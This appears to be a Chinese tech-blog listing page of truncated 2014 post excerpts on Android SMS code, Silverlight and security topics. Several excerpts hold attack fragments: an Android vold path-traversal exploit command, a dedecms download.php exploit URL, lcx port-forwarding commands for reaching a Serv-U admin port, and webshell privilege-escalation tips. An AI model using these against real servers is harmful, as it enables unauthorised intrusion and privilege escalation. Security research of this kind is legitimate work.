最近项目需求需要发送短信和接收验证码并将验证码显示在输入框中 以下是我的记录 前提---权限 发送短信并提示是否发送成功以及对方是否接收package com.javen.utils;import java.util.ArrayList;import android.app.Activity...
分类:
移动开发 时间:
2014-07-16 23:02:10
阅读次数:
299
从silverlight5开始,可以在项目设置中勾选“在浏览器内运行时需要提升的信任”来达到在浏览器内运行提权silverlight客户端的目的,在个特性很有用处。可我使用这个功能时遇到了一个奇怪的故障:我使用visual studio 2010开发一个silverlight5项目,发现上面那个设置...
分类:
Web程序 时间:
2014-07-14 15:47:49
阅读次数:
202
0x0 引言
我们知道,在Android上的Intent-based攻击很普遍,这种攻击轻则导致应用程序崩溃,重则可能演变提权漏洞。当然,通过静态特征匹配,Intent-based的恶意样本还是很容易被识别出来的。
然后,最近出现了一种基于Android Browser的攻击手段——Intent scheme URLs攻击。这种攻击方式利用了浏览器保护措施的不足,通过浏览器作为桥梁间接实...
分类:
移动开发 时间:
2014-07-06 09:05:56
阅读次数:
219
EXPLOIT "0 asec create ../../../../../../../../xxxxx/xx/xx/xx 1 ext4 98235792350852308254872354983460 2000 1"/dev/socket/vold 分析中...一起研究分析
分类:
其他好文 时间:
2014-06-18 16:24:34
阅读次数:
298
在2013年7月13日前的版本。影响网站:所有dedecms版本漏洞页面plus/download.php漏洞脚本plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs..
分类:
其他好文 时间:
2014-06-16 17:50:04
阅读次数:
245
这个是在提权某国外服务器时候发现的,该服务器的环境是win2k3+iis6.0。烤肉,pr,iis6的漏洞补丁都没有打,但是,可写很少。上传了啊D牛的脚本后找到可写目录了。可写目录C:\Program
Files\Zend\ZendOptimizer-3.3.0\lib按照惯例上传cmd.txt p...
DWORD AdjustProcessToken(HANDLE hProcess, LPCTSTR
lpPrivilegeName){ HANDLE hToken; TOKEN_PRIVILEGES tp; tp.PrivilegeCount =1;
tp.Privileg...
分类:
其他好文 时间:
2014-05-29 16:18:44
阅读次数:
263
目前正在研究android 三方设备驱动 fuzzer , 也就是下图所说的 ioctl
fuzzing, 下图是由keen team nforest 大神发布;欢迎正在研究此方面的人联系我共同交流进步!Email:Blind Fuzz Smart
Fuzzandroid 内核栈溢出android ...
分类:
移动开发 时间:
2014-05-18 19:49:40
阅读次数:
798
1、在服务器上cmd 执行: lcx -slave 我的IP 5000 127.0.0.1
43958(有可能被改)2、 在本机运行 lcx -listen 5000 21 (lcx地址要写对)3、 打开本地的serv u
在IP上填入127.0.0.1 帐号:LocalAdministrator ...
分类:
其他好文 时间:
2014-05-08 14:16:27
阅读次数:
273
web)权限终极9技巧 当我们取得一个webshell时候,下一部要做的就是提升权限个人总结如下:1:
C:\Documents and Settings\All Users\Application
Data\Symantec\pcAnywhere\看能否跳转到这个目录,如果行那就最好了,直接下它的...
分类:
Web程序 时间:
2014-05-08 14:10:19
阅读次数:
553
